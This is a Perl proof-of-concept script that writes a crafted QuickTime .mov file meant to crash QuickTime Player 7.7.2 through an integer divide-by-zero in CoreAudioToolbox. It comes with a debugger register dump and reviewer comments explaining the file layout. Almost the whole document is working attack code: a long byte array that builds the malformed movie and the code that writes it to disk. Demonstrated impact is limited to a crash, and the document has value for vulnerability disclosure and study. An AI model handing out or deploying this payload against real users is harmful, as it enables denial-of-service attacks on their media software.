
# Title : Apple QuickTime Player 7.7.2 Crash PoC
# Published : 2012-10-24
# Author :


#!/usr/bin/perl
#Title     :  Apple QuickTime Player 7.7.2 Division By Zero
#Version   :  7.7.2(1680.56)
#Date      :  2012-10-23
#Vendor    :  http://www.apple.com
#Impact    :  Med/High (author's rating; what the PoC below demonstrates is a crash, i.e. denial of service, only)
#Contact   :  coolkaveh [at] rocketmail.com
#Twitter   :  @coolkaveh
#tested    :  XP SP3 ENG
###############################################################################
#Bug :
#----
#Don't forget that exploitable bugs will be published after being patched
#----
#Division-by-zero vulnerability in the handling of QuickTime (.mov) files.
#Opening the crafted file crashes the player, i.e. a denial-of-service condition.
#---- 
################################################################################
#(9fc.dc4): C++ EH exception - code e06d7363 (first chance)
#(9fc.dc4): C++ EH exception - code e06d7363 (first chance)
#(9fc.dc4): Integer divide-by-zero - code c0000094 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00000800 
#ebx=06b11490 
#ecx=00000000 
#edx=00000000 
#esi=00000800 
#edi=01069f80
#eip=0534499f 
#esp=0013ba24 
#ebp=00000000 iopl=0         nv up ei ng nz na pe cy
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010287
#*** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
#C:\Program Files\Common Files\Apple\Apple Application Support\CoreAudioToolbox.dll - 
#CoreAudioToolbox!ACQDesignDecoderEntry+0x2114f:
#0534499f f7f9            idiv    eax,ecx
#(ecx, the divisor, is 0 in the register dump above, so this signed 32-bit
# division in CoreAudioToolbox is what raises the c0000094 exception; the
# dump shows a crash, nothing here demonstrates control of anything beyond that)
########################################################################################################
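use strict;
use warnings;

# Crafted QuickTime (.mov) sample that makes QuickTime Player 7.7.2 fault
# with an integer divide-by-zero (the header's register dump shows
# `idiv eax,ecx` with ecx=0 inside CoreAudioToolbox).  Open the resulting
# file ONLY in an isolated, disposable test VM; what is demonstrated here
# is a crash (denial of service), nothing more.
#
# Layout, as far as the bytes themselves show: a 'moov' atom of 0x7B5
# (1973) bytes holding a video track ('SVQ1' sample description) and an
# audio track ('QDM2' / 'QDCA' sample description), followed by 'free',
# 'wide' and an 'mdat' whose declared size (0x13A0E) far exceeds what is
# written, i.e. the file is truncated.  The fault is reported in
# CoreAudioToolbox!ACQDesignDecoderEntry, which matches the QDesign audio
# track; presumably the zero divisor comes from one of that track's
# fields -- not confirmed by anything in this listing.
#
# NOTE(review): the published listing had lost its backslashes ("x00"
# instead of "\x00"); as printed it would have produced a ~3 KB ASCII text
# file, not a movie.  The escapes are restored here.
my $poc =
"\x00\x00\x07\xB5\x6D\x6F\x6F\x76\x00\x00\x00\x6C\x6D\x76\x68\x64\x00\x00\x00\x00\xB6\xB6\xFE\x42\xB6".
"\xB6\xFE\x43\x00\x00\x02\x58\x00\x00\x0B\xB8\x00\x01\x00\x00\x00\xFF\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x34".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x03\xD9\x74\x72\x61\x6B\x00".
"\x00\x00\x5C\x74\x6B\x68\x64\x00\x00\x00\x0F\xB6\xA9\x7A\x1B\xB6\xB6\xFE\x43\x00\x00\x00\x01\x00\x00".
"\x00\x00\x00\x00\x0B\xB8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x40\x00\x00\x00\x00\xBE\x00\x00\x00\xF0\x00\x00\x00\x00\x00\x18\x6C\x6F\x61\x64\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x24\x65\x64\x74\x73\x00\x00".
"\x00\x1C\x65\x6C\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x0B\xB8\x00\x00\x00\x00\x00\x01\x00".
"\x00\x00\x00\x03\x2D\x6D\x64\x69\x61\x00\x00\x00\x20\x6D\x64\x68\x64\x00\x00\x00\x00\xB6\xB6\xFE\x42".
"\xB6\xB6\xFE\x43\x00\x00\x02\x58\x00\x00\x0B\xB8\x00\x00\x00\x00\x00\x00\x00\x3A\x68\x64\x6C\x72\x00".
"\x00\x00\x00\x6D\x68\x6C\x72\x76\x69\x64\x65\x61\x70\x70\x6C\x00\x00\x00\x00\x00\x01\x01\x91\x19\x41".
"\x70\x70\x6C\x65\x20\x56\x69\x64\x65\x6F\x20\x4D\x65\x64\x69\x61\x20\x48\x61\x6E\x64\x6C\x65\x72\x00".
"\x00\x02\xCB\x6D\x69\x6E\x66\x00\x00\x00\x14\x76\x6D\x68\x64\x00\x00\x00\x01\x00\x40\x80\x00\x80\x00".
"\x80\x00\x00\x00\x00\x39\x68\x64\x6C\x72\x00\x00\x00\x00\x64\x68\x6C\x72\x61\x6C\x69\x73\x61\x70\x70".
"\x6C\x40\x00\x00\x01\x00\x01\x00\x49\x18\x41\x70\x70\x6C\x65\x20\x41\x6C\x69\x61\x73\x20\x44\x61\x74".
"\x61\x20\x48\x61\x6E\x64\x6C\x65\x72\x00\x00\x00\x24\x64\x69\x6E\x66\x00\x00\x00\x1C\x64\x72\x65\x66".
"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x61\x6C\x69\x73\x00\x00\x00\x01\x00\x00\x02\x52\x73".
"\x74\x62\x6C\x00\x00\x00\x66\x73\x74\x73\x64\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x56\x53\x56".
"\x51\x31\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x18\x53\x56\x69\x73\x00\x00\x03\xFF\x00\x00\x02".
"\x00\x00\xBE\x00\xF0\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x0E\x53\x6F\x72\x65\x6E".
"\x73\x6F\x6E\x20\x56\x69\x64\x65\x6F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x18\xFF\xFF\x00\x00\x00\x18\x73\x74\x74\x73\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x3C".
"\x00\x00\x00\x32\x00\x00\x00\x18\x73\x74\x73\x73\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00".
"\x00\x00\x02\x00\x00\x00\x4C\x73\x74\x73\x63\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00".
"\x00\x03\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x12\x00\x00\x00".
"\x03\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x14\x00\x00\x00\x03".
"\x00\x00\x00\x01\x00\x00\x01\x04\x73\x74\x73\x7A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3C\x00".
"\x00\x01\x94\x00\x00\x01\xE4\x00\x00\x00\x7C\x00\x00\x00\x44\x00\x00\x00\x44\x00\x00\x00\x60\x00\x00".
"\x00\x60\x00\x00\x00\x64\x00\x00\x00\x6C\x00\x00\x00\x70\x00\x00\x00\x88\x00\x00\x00\x44\x00\x00\x00".
"\x88\x00\x00\x00\x58\x00\x00\x00\xD0\x00\x00\x01\x2C\x00\x00\x02\x10\x00\x00\x02\xD0\x00\x00\x03\xE4".
"\x00\x00\x04\x00\x00\x00\x05\xC8\x00\x00\x06\xE8\x00\x00\x08\x78\x00\x00\x06\x40\x00\x00\x0A\x14\x00".
"\x00\x09\x68\x00\x00\x0B\x88\x00\x00\x0A\x1C\x00\x00\x0C\x10\x00\x00\x0A\x20\x00\x00\x10\x4C\x00\x00".
"\x0E\x90\x00\x00\x13\x5C\x00\x00\x0E\x80\x00\x00\x0F\x78\x00\x00\x0A\x54\x00\x00\x0C\x3C\x00\x00\x02".
"\x84\x00\x00\x06\x74\x00\x00\x01\xF0\x00\x00\x03\x28\x00\x00\x00\xB4\x00\x00\x00\xA4\x00\x00\x00\x9C".
"\x00\x00\x00\x88\x00\x00\x00\x3C\x00\x00\x00\x60\x00\x00\x00\x34\x00\x00\x00\x6C\x00\x00\x00\x60\x00".
"\x00\x00\x40\x00\x00\x00\x40\x00\x00\x00\x68\x00\x00\x00\x54\x00\x00\x00\x38\x00\x00\x00\x44\x00\x00".
"\x00\x60\x00\x00\x00\x40\x00\x00\x00\x3C\x00\x00\x00\x40\x00\x00\x00\x64\x73\x74\x63\x6F\x00\x00\x00".
"\x00\x00\x00\x00\x15\x00\x00\x17\xCB\x00\x00\x1B\xBF\x00\x00\x25\x53\x00\x00\x26\x83\x00\x00\x2E\xF9".
"\x00\x00\x30\xA9\x00\x00\x3D\xEF\x00\x00\x4B\x9B\x00\x00\x69\xE7\x00\x00\x88\xEB\x00\x00\xB0\x71\x00".
"\x00\xE2\xA9\x00\x01\x13\xA1\x00\x01\x28\xD5\x00\x01\x35\xDB\x00\x01\x37\xA3\x00\x01\x3E\x3B\x00\x01".
"\x3F\x07\x00\x01\x3F\xEF\x00\x01\x40\x43\x00\x01\x41\x1F\x00\x00\x00\x0C\x75\x64\x74\x61\x00\x00\x00".
"\x00\x00\x00\x02\xD7\x74\x72\x61\x6B\x00\x00\x00\x5C\x74\x6B\x68\x64\x00\x00\x00\x0F\xB6\xA9\x7A\x1B".
"\xB6\xB6\xFE\x43\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x0B\x89\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x01\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x24\x65\x64\x74\x73\x00\x00\x00\x1C\x65\x6C\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01".
"\x00\x00\x0B\x89\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x02\x43\x6D\x64\x69\x61\x00\x00\x00\x20\x6D".
"\x64\x68\x64\x00\x00\x00\x00\xB6\xB6\xFE\x42\xB6\xB6\xFE\x42\x00\x00\x56\x22\x00\x01\xA8\x00\x00\x00".
"\x00\x00\x00\x00\x00\x3A\x68\x64\x6C\x72\x00\x00\x00\x00\x6D\x68\x6C\x72\x73\x6F\x75\x6E\x61\x70\x70".
"\x6C\x00\x00\x00\x00\x00\x01\x01\x92\x19\x41\x70\x70\x6C\x65\x20\x53\x6F\x75\x6E\x64\x20\x4D\x65\x64".
"\x69\x61\x20\x48\x61\x6E\x64\x6C\x65\x72\x00\x00\x01\xE1\x6D\x69\x6E\x66\x00\x00\x00\x10\x73\x6D\x68".
"\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x39\x68\x64\x6C\x72\x00\x00\x00\x00\x64\x68\x6C\x72".
"\x61\x6C\x69\x73\x61\x70\x70\x6C\x40\x00\x00\x01\x00\x01\x00\x49\x18\x41\x70\x70\x6C\x65\x20\x41\x6C".
"\x69\x61\x73\x20\x44\x61\x74\x61\x20\x48\x61\x6E\x64\x6C\x65\x72\x00\x00\x00\x24\x64\x69\x6E\x66\x00".
"\x00\x00\x1C\x64\x72\x65\x66\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x61\x6C\x69\x73\x00\x00".
"\x00\x01\x00\x00\x01\x6C\x73\x74\x62\x6C\x00\x00\x00\x84\x73\x74\x73\x64\x00\x00\x00\x00\x00\x00\x00".
"\x01\x00\x00\x00\x74\x51\x44\x4D\x32\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00".
"\x00\x02\x00\x10\x00\x00\x00\x00\x56\x22\x00\x00\x00\x00\x08\x00\x00\x00\x00\xB9\x00\x00\x01\x72\x00".
"\x00\x00\x02\x00\x00\x00\x40\x77\x61\x76\x65\x00\x00\x00\x0C\x66\x72\x6D\x61\x51\x44\x4D\x32\x00\x00".
"\x00\x24\x51\x44\x43\x41\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x56\x22\x00\x00\x7D\x00\x00\x00\x08".
"\x00\x00\x00\x00\x00\x00\x00\x01\x72\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x73\x74\x74\x73".
"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01\xA8\x00\x00\x00\x00\x01\x00\x00\x00\x7C\x73\x74\x73\x63\x00".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x01\x00\x00\x30\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00".
"\x28\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x30\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x28".
"\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x30\x00\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x28\x00".
"\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x30\x00\x00\x00\x00\x01\x00\x00\x00\x09\x00\x00\x28\x00\x00".
"\x00\x00\x01\x00\x00\x00\x0A\x00\x00\x20\x00\x00\x00\x00\x01\x00\x00\x00\x14\x73\x74\x73\x7A\x00\x00".
"\x00\x00\x00\x00\x00\x01\x00\x01\xA8\x00\x00\x00\x00\x38\x73\x74\x63\x6F\x00\x00\x00\x00\x00\x00\x00".
"\x0A\x00\x00\x07\xE5\x00\x00\x10\x91\x00\x00\x1C\xA7\x00\x00\x27\xBF\x00\x00\x36\xB5\x00\x00\x61\x3B".
"\x00\x00\xA9\x37\x00\x01\x0A\xF5\x00\x01\x2E\xA1\x00\x01\x38\x73\x00\x00\x00\x0C\x75\x64\x74\x61\x00".
"\x00\x00\x00\x00\x00\x00\x91\x75\x64\x74\x61\x00\x00\x00\x20\x4D\x43\x50\x53\x4D\x43\x50\x52\x2D\x66".
"\x6F\x72\x20\x4D\x61\x63\x69\x6E\x74\x6F\x73\x68\x2D\x35\x2E\x30\x2E\x30\x00\x00\x00\x10\x70\x6C\x61".
"\x79\x01\x00\x00\x00\x0C\x57\x4C\x4F\x00\x00\x00\x22\xA9\x6E\x61\x6D\x00\x16\x00\x00\x51\x75\x69\x63".
"\x6B\x54\x69\x6D\x65\x20\x53\x61\x6D\x70\x6C\x65\x20\x4D\x6F\x76\x69\x65\x00\x00\x00\x27\xA9\x63\x70".
"\x79\x00\x1B\x00\x00\xA9\x20\x41\x70\x70\x6C\x65\x20\x43\x6F\x6D\x70\x75\x74\x65\x72\x2C\x20\x49\x6E".
"\x63\x2E\x20\x32\x30\x30\x31\x00\x00\x00\x0C\x57\x4C\x4F\x43\x00\x32\x00\x17\x00\x00\x00\x00\x00\x00".
# end of 'moov' (offset 1973); 'free', 'wide' and the truncated 'mdat' follow
"\x00\x10\x66\x72\x65\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x77\x69\x64\x65\x00\x01\x3A".
"\x0E\x6D\x64\x61\x74\x00\x00\x00\x08\x77\x69\x64\x65\x00\x00\x00\x00\x6D\x64\x61\x74\x82\x01\x6F\x17".
"\x18\x09\x25\xCC\x2F\x93\xF9\x65\x32\xBF\x4C\xE6\x97\xC9\xFC\x32\x99\x5F\x26\xF3\xCB\x64\x7E\x99\xCC".
"\x2F\x93\xF9\x65\x32\xBF\x4C\xE6\x97\xC9\xFC\x32\x99\x5F\x26\x16\x01\x16\x15\x01\x55\x14\x01\x55\x13".
"\x01\x20\x12\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
# 11 lines x 25 zero bytes of padding
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x01\x6F\x17\x18\x09\x25\xCC\x2F".
"\x93\xF9\x65\x32\xBF\x4C\xE6\x97\xC9\xFC\x32\x99\x5F\x26\xF3\xCB\x64\x7E\x99\xCC\x2F\x93\xF9\x65\x32".
"\xBF\x4C\xE6\x97\xC9\xFC\x32\x99\x5F\x26\x16\x01\x16\x15\x01\x55\x14\x01\x55\x13\x01\x20\x12\x01\x00".
# 12 lines x 25 zero bytes of padding
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x01\x6F\x26\xA8\x09\x25\xCC\x2F\x93\xF9\x65\x32\xBF".
"\x4C\xE6\x97\xC9\xFC\x32\x99\x5F\x26\xF3\xCB\x64\x7E\x99\xCC\x2F\x93\xF9\x65\x32\xBF\x4C\xE6\x97\xC9".
"\xFC\x32\x99\x5F\x26\x16\x01\x16\x15\x01\x55\x14\x01\x55\x13\x01\x20\x12\x24\xFC\x45\xCC\xEA\x46\xA1".
"\x36\x36\x3A\xB7\x2E\x1A\x54\x45\x5B\xD5\x48\x5D\x35\xF2\x4A\x45\xB4\x8A\xA8\x14\xD1\x28\x46\x58\x50".
"\x23\x02\xAA\x31\xE5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
# 10 lines x 25 zero bytes of padding
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x82\x01\x6F\x97\xF2\x09\x3B\x31\x53\x5F\xE1\xB8\xC3\x13\xF5\xE8\xD1\x41\x62".
"\xDD\xDD\xD6\xA4\xF5\xE0\x0D";

# Output path: first command-line argument if given, else poc.mov in the
# current directory (the original hard-coded name, kept for compatibility).
my $out = @ARGV ? $ARGV[0] : "poc.mov";

# Lexical filehandle, raw (no newline/encoding translation) and every I/O
# step checked: the original silently produced an empty or partial file when
# the open or write failed.
open(my $fh, ">:raw", $out) or die "Cannot open $out for writing: $!\n";
print {$fh} $poc or die "Write to $out failed: $!\n";
close($fh) or die "Close of $out failed: $!\n";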